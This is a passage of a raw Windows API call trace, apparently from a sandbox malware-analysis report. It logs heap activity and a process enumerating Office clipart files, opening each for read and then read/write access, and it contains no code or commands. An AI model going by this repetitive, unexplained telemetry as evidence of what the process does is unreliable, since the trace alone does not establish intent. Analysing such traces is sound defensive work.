Size=0x20) returned 0x887e8 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.220] AreFileApisANSI () returned 1 [0102.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0102.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 69 [0102.221] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x504a)) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0102.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.221] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f1e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD09664_.WMF", cAlternateFileName="")) returned 1 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0102.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.222] AreFileApisANSI () returned 1 [0102.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0102.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0102.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.222] AreFileApisANSI () returned 1 [0102.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 69 [0102.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.222] GetFileType (hFile=0x33c) returned 0x1 [0102.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.222] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.223] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.223] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.223] CloseHandle (hObject=0x33c) returned 1 [0102.223] AreFileApisANSI () returned 1 [0102.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0102.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 69 [0102.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.223] GetFileType (hFile=0x33c) returned 0x1 [0102.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.223] CloseHandle (hObject=0x33c) returned 1 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.225] AreFileApisANSI () returned 1 [0102.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0102.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 69 [0102.225] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f1e)) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0102.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.225] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34cb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD10890_.GIF", cAlternateFileName="")) returned 1 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0102.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.226] AreFileApisANSI () returned 1 [0102.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF", lpUsedDefaultChar=0x0) returned 69 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0102.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.226] AreFileApisANSI () returned 1 [0102.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 69 [0102.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.227] GetFileType (hFile=0x33c) returned 0x1 [0102.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.227] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.228] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.228] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.228] CloseHandle (hObject=0x33c) returned 1 [0102.228] AreFileApisANSI () returned 1 [0102.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 69 [0102.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.228] GetFileType (hFile=0x33c) returned 0x1 [0102.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.228] CloseHandle (hObject=0x33c) returned 1 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 